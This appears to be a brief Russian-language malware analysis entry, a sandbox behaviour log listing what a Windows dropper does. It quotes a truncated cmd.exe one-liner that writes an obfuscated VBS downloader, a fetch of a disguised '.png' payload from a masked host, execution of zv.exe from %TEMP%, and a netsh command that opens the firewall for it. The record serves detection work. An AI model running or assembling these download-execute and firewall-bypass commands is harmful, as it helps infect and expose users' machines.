Техническая информация
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%TEMP%\ZV.EXE" "ZV.EXE" ENABLE
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO J3g= "http://g.###4top.io/p_1591qh6u31.png">>W9j.VBS &@ECHO R6s = V0l("njBYlY")>>W9j.VBS &@ECHO Set C1e = CreateObject(V0l("agla`FBla`\hhd"))>>W9j.VBS &@ECHO C1e.Open V0l("...
- %TEMP%\w9j.vbs
- %TEMP%\zv.exe
- %TEMP%\w9j.vbs
- http://g.###4top.io/p_1591qh6u31.png
- DNS ASK g.###4top.io
- '<SYSTEM32>\wscript.exe' "%TEMP%\W9j.VBS"
- '%TEMP%\zv.exe'
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO J3g= "http://g.###4top.io/p_1591qh6u31.png">>W9j.VBS &@ECHO R6s = V0l("njBYlY")>>W9j.VBS &@ECHO Set C1e = CreateObject(V0l("agla`FBla`\hhd"))>>W9j.VBS &@ECHO C1e.Open V0l("...' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%TEMP%\ZV.EXE" "ZV.EXE" ENABLE' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13